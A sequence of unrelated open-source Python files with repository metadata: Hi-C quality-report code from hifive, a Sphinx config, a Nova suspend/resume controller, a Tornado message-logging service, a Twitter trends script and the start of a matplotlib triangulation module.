self.comm.send([node_ranges[i], node_ranges[i + 1], min(node_ranges[i + 1] + width, N)], dest=i)
self.comm.Send(norm[node_ranges[i]:min(node_ranges[i + 1] + width, N), :], dest=i)
start = 0
stop = node_ranges[1]
stop2 = min(node_ranges[1] + width, N)
else:
err = self.comm.bcast(None, root=0)
if err:
return None
N = self.comm.bcast(None, root=0)
vrows = numpy.zeros(N, dtype=numpy.int32)
self.comm.Bcast(vrows, root=0)
start, stop, stop2, N = self.comm.recv(source=0)
norm = numpy.zeros((stop2 - start, width * 2), dtype=numpy.float64)
self.comm.Recv(norm, source=0)
corr = numpy.zeros((stop - start, width), dtype=numpy.float64)
corr.fill(numpy.inf)
_quasar.find_correlations(
norm,
vrows,
corr,
start)
if self.rank == 0:
corrs = numpy.zeros((N, width), dtype=numpy.float64)
corrs[:corr.shape[0], :] = corr
del corr
for i in range(1, self.num_procs):
self.comm.Recv(corrs[node_ranges[i]:node_ranges[i + 1], :], source=i)
return corrs
else:
self.comm.Send(corr, dest=0)
del corr
return None
def _print_txt_report(self, filename, qscores, rscores, scores_only=False):
output = open(filename, 'w')
if qscores is not None:
chromosomes = numpy.r_[numpy.array(['All']), numpy.unique(qscores['chromosome'][numpy.where(qscores['chromosome'] != 'All')])]
resolutions = numpy.unique(qscores['resolution'])
coverages = numpy.unique(qscores['coverage'])
if numpy.where(coverages == 0)[0].shape[0] > 0:
zero_cov = self.storage.attrs['total_reads']
print >> output, 'Quality Score Results\n'
temp = ['Resolution', 'Coverage'] + list(chromosomes)
print >> output, '\t'.join(temp)
for i, res in enumerate(resolutions):
if res < 1000:
label = "%i bp" % res
elif res < 1000000:
label = "%i Kb" % (res / 1000)
else:
label = "%i Mb" % (res / 1000000)
for j, cov in enumerate(coverages):
if cov == 0:
temp = [label, self._num2str(zero_cov)]
else:
temp = [label, self._num2str(cov)]
for k, chrom in enumerate(chromosomes):
where = numpy.where((qscores['chromosome'] == chrom) & (qscores['resolution'] == res) & (qscores['coverage'] == cov))[0][0]
temp.append("%0.6f" % qscores['score'][where])
print >> output, '\t'.join(temp)
print >> output, '\n'
# if there are sufficient data points, calculate estimated maximum
if coverages.shape[0] > 3 and not scores_only:
def f(x, x0, k, L):
return L / (1 + numpy.exp(-k * (x - x0)))
Xs = numpy.log10(coverages)
print >> output, "Estimated quality-coverage curves (Maximum Quality / (1 + e^(-Scale * (x - Inflection)))"
for i, res in enumerate(resolutions):
where = numpy.where((qscores['chromosome'] == 'All') & (qscores['resolution'] == res))[0]
Ys = qscores['score'][where]
Ys = Ys[numpy.argsort(qscores['coverage'][where])]
if res < 1000:
label = "%i bp" % res
elif res < 1000000:
label = "%i Kb" % (res / 1000)
else:
label = "%i Mb" % (res / 1000000)
try:
params = curve_fit(f, Xs, Ys, p0=(Xs[-1], 0.5, Ys[-1] * 2), maxfev=(5000*Xs.shape[0]),
bounds=((-numpy.inf, -numpy.inf, 0), (numpy.inf, numpy.inf, 2)))[0]
Y1s = f(Xs, *params)
print >> output, "Resolution: %s, Maximum Quality: %f, Scale: %f, Inflection: %f, Mean error: %e" % (label, params[2], params[1], params[0], numpy.mean((Ys - Y1s) ** 2.0))
except:
print >> output, "Resolution: %s, curve could not be estimated" % label
print >> output, '\n'
# if there are multiple coverages, estimate maximum usable resolution
if resolutions.shape[0] > 1 and not scores_only:
Xs = numpy.log10(resolutions)
where = numpy.where((qscores['chromosome'] == 'All') & (qscores['coverage'] == coverages[-1]))[0]
Ys = qscores['score'][where]
Ys = Ys[numpy.argsort(qscores['resolution'][where])]
pos = 0
while pos < Xs.shape[0] - 1 and self.strict_qcutoff > Ys[pos + 1]:
pos += 1
if self.strict_qcutoff < Ys[0]:
print >> output, "Strict quality maximum resolution is above the resolutions tested."
elif self.strict_qcutoff > numpy.amax(Ys):
print >> output, "Strict quality maximum resolution is below the resolutions tested."
else:
A = (Ys[pos + 1] - Ys[pos]) / (Xs[pos + 1] - Xs[pos])
B = Ys[pos] - Xs[pos] * A
print >> output, "Strict quality maximum resolution: %s bp" % self._num2str(
int(round(10.0 ** ((self.strict_qcutoff - B) / A))))
pos = 0
while pos < Xs.shape[0] - 1 and self.loose_qcutoff > Ys[pos + 1]:
pos += 1
if self.loose_qcutoff < Ys[0]:
print >> output, "Loose quality maximum resolution is above the resolutions tested."
elif self.loose_qcutoff > numpy.amax(Ys):
print >> output, "Loose quality maximum resolution is below the resolutions tested."
else:
A = (Ys[pos + 1] - Ys[pos]) / (Xs[pos + 1] - Xs[pos])
B = Ys[pos] - Xs[pos] * A
print >> output, "Loose quality maximum resolution: %s bp" % self._num2str(
int(round(10.0 ** ((self.loose_qcutoff - B) / A))))
print >> output, '\n'
if rscores is not None:
chromosomes = numpy.r_[numpy.array(['All']), numpy.unique(rscores['chromosome'][numpy.where(rscores['chromosome'] != 'All')])]
resolutions = numpy.unique(rscores['resolution'])
coverages = numpy.unique(rscores['coverage'])
print >> output, 'Replicate Score Results\n'
temp = ['Resolution', 'Coverage'] + list(chromosomes)
print >> output, '\t'.join(temp)
for i, res in enumerate(resolutions):
if res < 1000:
label = "%i bp" % res
elif res < 1000000:
label = "%i Kb" % (res / 1000)
else:
label = "%i Mb" % (res / 1000000)
for j, cov in enumerate(coverages):
temp = [label, self._num2str(cov)]
for k, chrom in enumerate(chromosomes):
where = numpy.where((rscores['chromosome'] == chrom) & (rscores['resolution'] == res) & (rscores['coverage'] == cov))[0][0]
temp.append("%0.6f" % rscores['score'][where])
print >> output, '\t'.join(temp)
print >> output, '\n'
# if there are multiple coverages, estimate maximum usable resolution
if resolutions.shape[0] > 1 and not scores_only:
Xs = numpy.log10(resolutions)
where = numpy.where((rscores['chromosome'] == 'All') & (rscores['coverage'] == coverages[-1]))[0]
Ys = rscores['score'][where]
Ys = Ys[numpy.argsort(rscores['resoluion'][where])]
pos = 0
while pos < Xs.shape[0] - 1 and self.strict_rcutoff > Ys[pos + 1]:
pos += 1
if self.strict_rcutoff < Ys[0]:
print >> output, "Strict replicate maximum resolution is above the resolutions tested."
elif self.strict_rcutoff > numpy.amax(Ys):
print >> output, "Strict replicate maximum resolution is below the resolutions tested."
else:
A = (Ys[pos + 1] - Ys[pos]) / (Xs[pos + 1] - Xs[pos])
B = Ys[pos] - Xs[pos] * A
print >> output, "Strict replicate maximum resolution: %s bp" % self._num2str(
int(round(10.0 ** ((self.strict_rcutoff - B) / A))))
pos = 0
while pos < Xs.shape[0] - 1 and self.loose_rcutoff > Ys[pos + 1]:
pos += 1
if self.loose_rcutoff < Ys[0]:
print >> output, "Loose replicate maximum resolution is above the resolutions tested."
elif self.loose_rcutoff > numpy.amax(Ys):
print >> output, "Loose replicate maximum resolution is below the resolutions tested."
else:
A = (Ys[pos + 1] - Ys[pos]) / (Xs[pos + 1] - Xs[pos])
B = Ys[pos] - Xs[pos] * A
print >> output, "Loose replicate maximum resolution: %s bp" % self._num2str(
int(round(10.0 ** ((self.loose_rcutoff - B) / A))))
print >> output, '\n'
output.close()
return None
def _print_pdf_report(self, filename, qscores, rscores, scores_only=False):
c = canvas.canvas()
H = 0
if qscores is not None:
chromosomes = numpy.r_[numpy.array(['All']), numpy.unique(qscores['chromosome'][numpy.where(qscores['chromosome'] != 'All')])]
resolutions = numpy.unique(qscores['resolution'])
coverages = numpy.unique(qscores['coverage'])
if numpy.where(coverages == 0)[0].shape[0] > 0:
zero_cov = self.storage.attrs['total_reads']
c.text(H, 0, "Quality Score Results", [text.halign.left, text.valign.bottom, text.size(0)])
H -= 0.6
hoffset = 1.7
for i in range(coverages.shape[0] + 1):
c.stroke(path.line(hoffset + i * 2.0, H + 0.3, hoffset + i * 2.0, H - 0.3 * resolutions.shape[0]))
if i < coverages.shape[0]:
c.text(hoffset + (i + 0.5) * 2.0, H + 0.05, self._num2str(coverages[i]),
[text.halign.center, text.valign.bottom, text.size(-2)])
for i in range(resolutions.shape[0] + 1):
c.stroke(path.line(0, H - 0.3 * i, hoffset + coverages.shape[0] * 2.0, H - 0.3 * i))
c.text(hoffset + 1.0 * coverages.shape[0], H + 0.35, "Coverage",
[text.halign.center, text.valign.bottom, text.size(-2)])
c.text(hoffset - 0.1, H + 0.05, "Resolution",
[text.halign.right, text.valign.bottom, text.size(-2)])
H -= 0.3
for i, res in enumerate(resolutions):
if res < 1000:
label = "%i bp" % res
elif res < 1000000:
label = "%i Kb" % (res / 1000)
else:
label = "%i Mb" % (res / 1000000)
c.text(hoffset - 0.1, H + 0.05, label, [text.halign.right, text.valign.bottom, text.size(-2)])
for j, cov in enumerate(coverages):
where = numpy.where((qscores['chromosome'] == 'All') & (qscores['resolution'] == res) & (qscores['coverage'] == cov))[0][0]
c.text(hoffset + (j + 0.5) * 2.0, H + 0.05, '%0.6f' % qscores['score'][where],
[text.halign.center, text.valign.bottom, text.size(-2)])
H -= 0.3
H -= 0.6
hoffset = 0.9
# if there are sufficient data points, calculate estimated maximum quality
if coverages.shape[0] > 3 and not scores_only:
width = 17.0 / min(3, resolutions.shape[0]) - 0.3
def f(x, x0, k, L):
return L / (1 + numpy.exp(-k * (x - x0)))
Xs = coverages
lXs = numpy.log10(coverages)
c.text(0, H, r"Estimated quality-coverage curves $\frac{Maximum Quality}{1 + e^{-Scale * (x - Inflection)}}$", [text.halign.left, text.valign.bottom, text.size(-2)])
H -= 0.3
passed = False
for i, res in enumerate(resolutions):
where = numpy.where((qscores['chromosome'] == 'All') & (qscores['resolution'] == res))[0]
Ys = qscores['score'][where]
Ys = Ys[numpy.argsort(qscores['coverage'][where])]
c1 = self._plot_graph(Xs, Ys, width, 'q')
if res < 1000:
label = "%i bp" % res
elif res < 1000000:
label = "%i Kb" % (res / 1000)
else:
label = "%i Mb" % (res / 1000000)
try:
params = curve_fit(f, lXs, Ys, p0=(lXs[-1], 0.5, Ys[-1] * 2), maxfev=(5000*Xs.shape[0]),
bounds=((-numpy.inf, -numpy.inf, 0), (numpy.inf, numpy.inf, 2)))[0]
Y1s = f(lXs, *params)
passed = True
minX = numpy.log2(numpy.amin(Xs))
maxX = numpy.log2(numpy.amax(Xs))
minY = numpy.amin(Ys)
maxY = numpy.amax(Ys)
spanY = maxY - minY
minY -= 0.05 * spanY
maxY += 0.05 * spanY
c3 = canvas.canvas()
c3.insert(self._plot_line(Xs, Y1s, width, minX, maxX, minY, maxY, color.gray(0.5)))
c3.insert(c1)
c1 = c3
c1.text(hoffset, -0.15, "Resolution: %s" % label,
[text.halign.left, text.valign.top, text.size(-2)])
c1.text(hoffset, -0.45, "Maximum Quality: %f" % params[2],
[text.halign.left, text.valign.top, text.size(-2)])
c1.text(hoffset, -0.75, "Scale: %f," % params[1],
[text.halign.left, text.valign.top, text.size(-2)])
c1.text(hoffset, -1.05, "Inflection: %f" % params[0],
[text.halign.left, text.valign.top, text.size(-2)])
c1.text(hoffset, -1.35, "Mean Error: %e" % numpy.mean((Ys - Y1s) ** 2.0),
[text.halign.left, text.valign.top, text.size(-2)])
except:
c1.text(hoffset, -0.15, "Resolution: %s" % label,
[text.halign.left, text.valign.top, text.size(-2)])
c1.text(hoffset, -0.45, "curve could not be estimated",
[text.halign.left, text.valign.top, text.size(-2)])
c.insert(c1, [trafo.translate((width + 0.3) * i, H - width)])
if passed:
H -= width + 2.0
else:
H -= width + 1.1
# if there are multiple coverages, estimate maximum usable resolution
if resolutions.shape[0] > 1 and not scores_only:
Xs = resolutions
where = numpy.where((qscores['chromosome'] == 'All') & (qscores['coverage'] == coverages[-1]))[0]
Ys = qscores['score'][where]
Ys = Ys[numpy.argsort(qscores['resoluion'][where])]
width = 17.0 / 3.0 - 0.3
c1 = self._plot_graph(Xs, Ys, width, 'q', 'res')
pos = 0
while pos < Xs.shape[0] - 1 and self.strict_qcutoff > Ys[pos + 1]:
pos += 1
if self.strict_qcutoff < Ys[0]:
c1.text(0, -0.15, "Strict quality maximum resolution is above the resolutions tested.",
[text.halign.left, text.valign.top, text.size(-2)])
elif self.strict_qcutoff > numpy.amax(Ys):
c1.text(0, -0.15, "Strict quality maximum resolution is below the resolutions tested.",
[text.halign.left, text.valign.top, text.size(-2)])
else:
A = (Ys[pos + 1] - Ys[pos]) / (numpy.log10(Xs[pos + 1]) - numpy.log10(Xs[pos]))
B = Ys[pos] - numpy.log10(Xs[pos]) * A
c1.text(0, -0.15, "Strict quality maximum resolution: %s bp" % self._num2str(
int(round(10.0 ** ((self.strict_qcutoff - B) / A)))),
[text.halign.left, text.valign.top, text.size(-2)])
pos = 0
while pos < Xs.shape[0] - 1 and self.loose_qcutoff > Ys[pos + 1]:
pos += 1
if self.loose_qcutoff < Ys[0]:
c1.text(0, -0.45, "Loose quality maximum resolution is above the resolutions tested.",
[text.halign.left, text.valign.top, text.size(-2)])
elif self.loose_qcutoff > numpy.amax(Ys):
c1.text(0, -0.45, "Loose quality maximum resolution is below the resolutions tested.",
[text.halign.left, text.valign.top, text.size(-2)])
else:
A = (Ys[pos + 1] - Ys[pos]) / (numpy.log10(Xs[pos + 1]) - numpy.log10(Xs[pos]))
B = Ys[pos] - numpy.log10(Xs[pos]) * A
c1.text(0, -0.45, "Loose quality maximum resolution: %s bp" % self._num2str(
int(round(10.0 ** ((self.loose_qcutoff - B) / A)))),
[text.halign.left, text.valign.top, text.size(-2)])
c.insert(c1, [trafo.translate(0, H - width)])
H -= width + 1.1
if rscores is not None:
H -= 0.4
chromosomes = numpy.r_[numpy.array(['All']), numpy.unique(rscores['chromosome'][numpy.where(rscores['chromosome'] != 'All')])]
resolutions = numpy.unique(rscores['resolution'])
coverages = numpy.unique(rscores['coverage'])
c.text(0, H, "Replicate Score Results", [text.halign.left, text.valign.bottom, text.size(0)])
H -= 0.6
hoffset = 1.7
for i in range(coverages.shape[0] + 1):
c.stroke(path.line(hoffset + i * 2.0, H + 0.3, hoffset + i * 2.0, H - 0.3 * resolutions.shape[0]))
if i < coverages.shape[0]:
c.text(hoffset + (i + 0.5) * 2.0, H + 0.05, self._num2str(coverages[i]),
[text.halign.center, text.valign.bottom, text.size(-2)])
for i in range(resolutions.shape[0] + 1):
c.stroke(path.line(0, H - 0.3 * i, hoffset + coverages.shape[0] * 2.0, H - 0.3 * i))
c.text(hoffset + 1.0 * coverages.shape[0], H + 0.35, "Coverage",
[text.halign.center, text.valign.bottom, text.size(-2)])
c.text(hoffset - 0.1, H + 0.05, "Resolution",
[text.halign.right, text.valign.bottom, text.size(-2)])
H -= 0.3
for i, res in enumerate(resolutions):
if res < 1000:
label = "%i bp" % res
elif res < 1000000:
label = "%i Kb" % (res / 1000)
else:
label = "%i Mb" % (res / 1000000)
c.text(hoffset - 0.1, H + 0.05, label, [text.halign.right, text.valign.bottom, text.size(-2)])
for j, cov in enumerate(coverages):
where = numpy.where((rscores['chromosome'] == 'All') & (rscores['resolution'] == res) & (rscores['coverage'] == cov))[0][0]
c.text(hoffset + (j + 0.5) * 2.0, H + 0.05, '%0.6f' % rscores['score'][where],
[text.halign.center, text.valign.bottom, text.size(-2)])
H -= 0.3
H -= 0.4
hoffset = 0.9
# if there are sufficient data points, plot coverage vs score
if coverages.shape[0] >= 2 and not scores_only:
width = 17.0 / min(3, resolutions.shape[0]) - 0.3
Xs = coverages
for i, res in enumerate(resolutions):
if res < 1000:
label = "%i bp" % res
elif res < 1000000:
label = "%i Kb" % (res / 1000)
else:
label = "%i Mb" % (res / 1000000)
where = numpy.where((rscores['chromosome'] == 'All') & (rscores['resolution'] == res))[0]
Ys = rscores['score'][where]
Ys = Ys[numpy.argsort(rscores['coverage'][where])]
c1 = self._plot_graph(Xs, Ys, width, 'r')
c1.text(hoffset, -0.15, "Resolution: %s" % label,
[text.halign.left, text.valign.top, text.size(-2)])
c.insert(c1, [trafo.translate((width + 0.3) * i, H - width)])
H -= width + 0.8
# if there are multiple coverages, estimate maximum usable resolution
if resolutions.shape[0] > 1 and not scores_only:
Xs = resolutions
lXs = numpy.log10(resolutions)
where = numpy.where((rscores['chromosome'] == 'All') & (rscores['coverage'] == coverages[-1]))[0]
Ys = rscores['score'][where]
Ys = Ys[numpy.argsort(rscores['resoluion'][where])]
width = 17.0 / 3.0 - 0.3
c1 = self._plot_graph(Xs, Ys, width, 'r', 'res')
pos = 0
while pos < Xs.shape[0] - 1 and self.strict_rcutoff > Ys[pos + 1]:
pos += 1
if self.strict_rcutoff < Ys[0]:
c1.text(0, -0.15, "Strict replicate maximum resolution is above the resolutions tested.",
[text.halign.left, text.valign.top, text.size(-2)])
elif self.strict_rcutoff > numpy.amax(Ys):
c1.text(0, -0.15, "Strict replicate maximum resolution is below the resolutions tested.",
[text.halign.left, text.valign.top, text.size(-2)])
else:
A = (Ys[pos + 1] - Ys[pos]) / (lXs[pos + 1] - lXs[pos])
B = Ys[pos] - lXs[pos] * A
c1.text(0, -0.15, "Strict replicate maximum resolution: %s bp" % self._num2str(
int(round(10.0 ** ((self.strict_rcutoff - B) / A)))),
[text.halign.left, text.valign.top, text.size(-2)])
pos = 0
while pos < Xs.shape[0] - 1 and self.loose_rcutoff > Ys[pos + 1]:
pos += 1
if self.loose_rcutoff < Ys[0]:
c1.text(0, -0.45, "Loose replicate maximum resolution is above the resolutions tested.",
[text.halign.left, text.valign.top, text.size(-2)])
elif self.loose_rcutoff > numpy.amax(Ys):
c1.text(0, -0.45, "Loose replicate maximum resolution is below the resolutions tested.",
[text.halign.left, text.valign.top, text.size(-2)])
else:
A = (Ys[pos + 1] - Ys[pos]) / (lXs[pos + 1] - lXs[pos])
B = Ys[pos] - lXs[pos] * A
c1.text(0, -0.45, "Loose replicate maximum resolution: %s bp" % self._num2str(
int(round(10.0 ** ((self.loose_rcutoff - B) / A)))),
[text.halign.left, text.valign.top, text.size(-2)])
c.insert(c1, [trafo.translate(0, H - width)])
c.writePDFfile(filename)
return None
def _plot_graph(self, Xs, Ys, width, dtype, xaxis='cov'):
hoffset = 0.9
voffset = 0.6
pwidth = width - hoffset
pheight = width - voffset
c = canvas.canvas()
minX = numpy.log2(numpy.amin(Xs))
maxX = numpy.log2(numpy.amax(Xs))
if xaxis == 'cov':
minY = numpy.amin(Ys)
maxY = numpy.amax(Ys)
else:
if dtype == 'q':
minY = min(numpy.amin(Ys), self.loose_qcutoff)
maxY = max(numpy.amax(Ys), self.strict_qcutoff)
else:
minY = min(numpy.amin(Ys), self.loose_rcutoff)
maxY = max(numpy.amax(Ys), self.strict_rcutoff)
spanX = maxX - minX
spanY = maxY - minY
minY -= 0.05 * spanY
maxY += 0.05 * spanY
spanY = maxY - minY
c1 = self._plot_line(Xs, Ys, width, minX, maxX, minY, maxY)
if dtype == 'q':
ylab = 'Quality Score'
else:
ylab = 'Replicate Score'
c.text(0, voffset + pheight * 0.5, ylab,
[text.halign.center, text.valign.top, text.size(-2), trafo.rotate(90)])
if xaxis == 'cov':
if numpy.amin(Xs) < 1000000:
start = -1
else:
start = 0
stop = int(floor(maxX - numpy.log2(1000000)))
for i in range(start, stop + 1, 2):
val = 2 ** i
X = (i + numpy.log2(1000000) - minX) / spanX * pwidth + hoffset
c.stroke(path.line(X, voffset, X, voffset - 0.08))
c.stroke(path.line(X, voffset, X, width), [color.gray(0.9)])
if val < 0.1:
label = '%0.2f' % val
elif val < 1.0:
label = '%0.1f' % val
else:
label = '%i' % val
c.text(X, voffset - 0.1, label, [text.halign.center, text.valign.top, text.size(-2)])
for i in range(start - 2, stop + 3, 2):
xs = numpy.log2(numpy.linspace(2 ** i * 1000000, 2 ** (i + 2) * 1000000, 9)[1:-1])
xs = (xs - minX) / spanX * pwidth + hoffset
for x in xs:
if x > hoffset and x < width:
c.stroke(path.line(x, voffset, x, voffset - 0.05))
label = "Millions of Reads"
else:
for x in Xs:
X = (numpy.log2(x) - minX) / spanX * pwidth + hoffset
if x < 1000000:
label = '%iK' % (x / 1000)
else:
label = '%iM' % (x / 1000000)
c.stroke(path.line(X, voffset, X, voffset - 0.05))
c.text(X, voffset - 0.1, label, [text.halign.center, text.valign.top, text.size(-2)])
if X > hoffset and X < width:
c.stroke(path.line(X, voffset, X, width), [color.gray(0.9)])
label = "Resolution"
c.text(hoffset + pwidth * 0.5, 0, label, [text.halign.center, text.valign.bottom, text.size(-2)])
scale = 1.0
while maxY * 10 ** scale < 1.0:
scale += 1
step = 1.0
while (floor(maxY * 10 ** scale) - ceil(minY * 10 ** scale)) / step > 5:
step += 1.0
N = (floor(maxY * 10 ** scale) - ceil(minY * 10 ** scale)) / step
for i in numpy.linspace(floor(maxY * 10 ** scale) / 10 ** scale, ceil(minY * 10 ** scale) / 10 ** scale,
int(floor((floor(maxY * 10 ** scale) - ceil(minY * 10 ** scale)) / step)) + 1):
Y = (i - minY) / spanY * pheight + voffset
c.stroke(path.line(hoffset, Y, hoffset - 0.05, Y))
if Y > voffset and Y < width:
c.stroke(path.line(hoffset, Y, width, Y), [color.gray(0.9)])
if i < 0.01:
label = '%0.3f' % i
if i < 0.1:
label = '%0.2f' % i
else:
label = '%0.1f' % i
c.text(hoffset - 0.1, Y, label, [text.halign.right, text.valign.middle, text.size(-2)])
if xaxis == 'res':
if dtype == 'q':
Y1 = (self.strict_qcutoff - minY) / spanY * pheight + voffset
Y2 = (self.loose_qcutoff - minY) / spanY * pheight + voffset
else:
Y1 = (self.strict_rcutoff - minY) / spanY * pheight + voffset
Y2 = (self.loose_rcutoff - minY) / spanY * pheight + voffset
c.stroke(path.line(hoffset, Y1, width, Y1), [style.linestyle.dashed])
c.stroke(path.line(hoffset, Y2, width, Y2), [style.linestyle.dotted])
c.insert(c1)
c.stroke(path.rect(hoffset, voffset, pwidth, pheight))
return c
def _plot_line(self, Xs, Ys, width, minX, maxX, minY, maxY, pcolor=None):
if pcolor is None:
pcolor = color.rgb.black
spanX = maxX - minX
spanY = maxY - minY
hoffset = 0.9
voffset = 0.6
pwidth = width - hoffset
pheight = width - voffset
c = canvas.canvas([canvas.clip(path.rect(hoffset, voffset, pwidth, pheight))])
order = numpy.argsort(Xs)
xs = (numpy.log2(Xs[order]) - minX) / spanX * pwidth + hoffset
ys = (Ys[order] - minY) / spanY * pheight + voffset
lpath = path.path(path.moveto(xs[0], ys[0]))
for i in range(1, xs.shape[0]):
lpath.append(path.lineto(xs[i], ys[i]))
c.stroke(lpath, [pcolor])
return c
def _num2str(self, n):
s = []
n1 = str(n)
while len(n1) > 3:
s = [n1[-3:]] + s
n1 = n1[:-3]
if len(n1) > 0:
s = [n1] + s
return ','.join(s) | bxlab/hifive | hifive/quasar.py | Python | mit | 62,263 |
# -*- coding: utf-8 -*-
# Sphinx configuration for building the Darkslide documentation.
from __future__ import unicode_literals
import sphinx_py3doc_enhanced_theme
# Sphinx extensions enabled for the build.
extensions = [
    'sphinx.ext.autodoc',
    'sphinx.ext.autosummary',
    'sphinx.ext.coverage',
    'sphinx.ext.doctest',
    'sphinx.ext.extlinks',
    'sphinx.ext.ifconfig',
    'sphinx.ext.napoleon',
    'sphinx.ext.todo',
    'sphinx.ext.viewcode',
]
# Documents are reStructuredText, rooted at 'index'.
source_suffix = '.rst'
master_doc = 'index'
# Project metadata used in titles and the copyright notice.
project = 'Darkslide'
year = '2015-2021'
author = 'Ionel Cristian Mărieș'
copyright = '{0}, {1}'.format(year, author)
version = release = '6.0.0'
pygments_style = 'trac'
templates_path = ['.']
# Shorthand roles for linking to GitHub issues and pull requests.
extlinks = {
    'issue': ('https://github.com/ionelmc/python-darkslide/issues/%s', '#'),
    'pr': ('https://github.com/ionelmc/python-darkslide/pull/%s', 'PR #'),
}
# HTML theme and layout options.
html_theme = "sphinx_py3doc_enhanced_theme"
html_theme_path = [sphinx_py3doc_enhanced_theme.get_html_theme_path()]
html_theme_options = {
    'githuburl': 'https://github.com/ionelmc/python-darkslide/'
}
html_use_smartypants = True
html_last_updated_fmt = '%b %d, %Y'
html_split_index = False
html_sidebars = {
    '**': ['searchbox.html', 'globaltoc.html', 'sourcelink.html'],
}
html_short_title = '%s-%s' % (project, version)
# Napoleon docstring-parsing settings.
napoleon_use_ivar = True
napoleon_use_rtype = False
napoleon_use_param = False
| ionelmc/python-darkslide | docs/conf.py | Python | apache-2.0 | 1,275 |
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from webob import exc
from nova.api.openstack import common
from nova.api.openstack import wsgi
from nova.compute import api as compute
from nova import exception
from nova.policies import suspend_server as ss_policies
class SuspendServerController(wsgi.Controller):
    """Server-actions controller for the ``suspend`` and ``resume`` actions."""

    def __init__(self):
        super(SuspendServerController, self).__init__()
        self.compute_api = compute.API()

    @wsgi.response(202)
    @wsgi.expected_errors((404, 409))
    @wsgi.action('suspend')
    def _suspend(self, req, id, body):
        """Permit admins to suspend the server."""
        context = req.environ['nova.context']
        instance = common.get_instance(self.compute_api, context, id)
        try:
            # Policy check is scoped to the instance's owner.
            context.can(ss_policies.POLICY_ROOT % 'suspend',
                        target={'user_id': instance.user_id,
                                'project_id': instance.project_id})
            self.compute_api.suspend(context, instance)
        except (exception.OperationNotSupportedForSEV,
                exception.InstanceIsLocked) as e:
            raise exc.HTTPConflict(explanation=e.format_message())
        except exception.InstanceInvalidState as state_error:
            common.raise_http_conflict_for_instance_invalid_state(
                state_error, 'suspend', id)

    @wsgi.response(202)
    @wsgi.expected_errors((404, 409))
    @wsgi.action('resume')
    def _resume(self, req, id, body):
        """Permit admins to resume the server from suspend."""
        context = req.environ['nova.context']
        context.can(ss_policies.POLICY_ROOT % 'resume')
        instance = common.get_instance(self.compute_api, context, id)
        try:
            self.compute_api.resume(context, instance)
        except exception.InstanceIsLocked as e:
            raise exc.HTTPConflict(explanation=e.format_message())
        except exception.InstanceInvalidState as state_error:
            common.raise_http_conflict_for_instance_invalid_state(
                state_error, 'resume', id)
| rahulunair/nova | nova/api/openstack/compute/suspend_server.py | Python | apache-2.0 | 2,596 |
#!/usr/bin/env python
"""
Sample rest service for mod_log_rest
Author: Brendon Crawford <brendon@last.vc>
"""
import json
import logging
import uuid
from tornado.ioloop import IOLoop
from tornado.web import RequestHandler, Application
import settings
# Configure root logging once at import time (INFO and above, default format).
logging.basicConfig(level=logging.INFO)
def main():
    """Build the web application, bind it, and run the IO loop forever.

    Returns:
        int: exit status (0 on normal shutdown).
    """
    app = Application(_routes())
    app.listen(settings.LISTEN_PORT, settings.LISTEN_HOST)
    IOLoop.instance().start()
    return 0
def _routes():
    """Return the URL routing table.

    Returns:
        list: (url_pattern, handler_class) tuples for the Application.
    """
    return [
        (r'/messages/add/?', AdderHandler),
    ]
class Handler(RequestHandler):
    """
    Base handler for this app: serializes tagged JSON responses.
    """
    def dump(self, status, req_type, **val):
        """
        Write *val* as a JSON response, tagged with 'status', 'req_type'
        and a freshly generated 'response_id'.
        """
        # Work on a copy and serialize it explicitly.  The original did
        # `out = val` and then dumped `val`, which only included the tags
        # because `out` aliased the same dict -- confusing and fragile.
        out = dict(val)
        out['status'] = status
        out['req_type'] = req_type
        out['response_id'] = uuid.uuid4().hex
        return self.write(json.dumps(out))
class AdderHandler(Handler):
    """
    Handler to Add New Nodes
    """
    def _optional_argument(self, name):
        """Return the named request argument, or None when it was not sent."""
        # `in` replaces dict.has_key(), which does not exist on Python 3
        # and is deprecated on Python 2.
        if name in self.request.arguments:
            return self.get_argument(name)
        return None

    def post(self):
        """
        Accept an add-message request, log its fields and acknowledge.

        Returns: bool
        """
        subject = self._optional_argument('subject')
        body = self._optional_argument('body')
        from_jid = self._optional_argument('from_jid')
        to_jid = self._optional_argument('to_jid')
        self.act(from_jid, to_jid, body, subject)
        self.dump(100, 1)
        return True

    def act(self, from_jid, to_jid, body, subject):
        """
        Log the received message fields.
        """
        logging.info("ADD:\nfrom_jid:%s\nto_jid:%s\nsubject:%s\nbody:%s\n" % \
                     (from_jid, to_jid, subject, body))
        return True
if __name__ == "__main__":
    # Run the server when invoked as a script; propagate main()'s exit status.
    exit(main())
| brendoncrawford/ejabberd_mod_log_rest | web/application.py | Python | lgpl-2.1 | 2,060 |
#!/usr/bin/env python
# Scans twitter for trending terms, populates a database with the results and
# then creates a json file showing trends based on the data
import CreateJson as j
import TwitterSearch as t
import KeywordSearch as k
import Log as l
import logging
# Overall success flag reported in the final log line.
ProcessResult = False
FN_NAME = "TrendingTermsSentiment"
# Log to a dedicated file with timestamps; INFO and above.
logging.basicConfig(filename='TwitterMetrics_Sentiment.log', format='%(asctime)s %(levelname)s: %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p', level=logging.INFO)
logging.info('%s - Process Start', FN_NAME)
# One timestamp ties together the tweet scan and the keyword search below.
TimeStamp = l.CreateTimeStamp()
# NOTE(review): CreateJson (j) is imported but never used here -- confirm
# whether the JSON step belongs in this script or is driven elsewhere.
if t.ScanTwitter(TimeStamp) == True:
    if k.SearchTweetsForKeywords(TimeStamp) == True:
        ProcessResult = True
    else:
        logging.warning('%s - Function SearchTweetsForKeywords in KeywordSearch module failed to run correctly', FN_NAME)
else:
    logging.warning('%s - Function ScanTwitter in TwitterSearch module failed to run correctly', FN_NAME)
logging.info('%s - Process complete with status %s', FN_NAME, ProcessResult)
| AdamDynamic/TwitterMetrics | TrendingTermsSentiment.py | Python | gpl-2.0 | 1,025 |
import warnings
# 2.3 compatibility
try:
set
except NameError:
import sets
set = sets.Set
import numpy as np
from matplotlib._delaunay import delaunay
from .interpolate import LinearInterpolator, NNInterpolator
__all__ = ['Triangulation', 'DuplicatePointWarning']
class DuplicatePointWarning(RuntimeWarning):
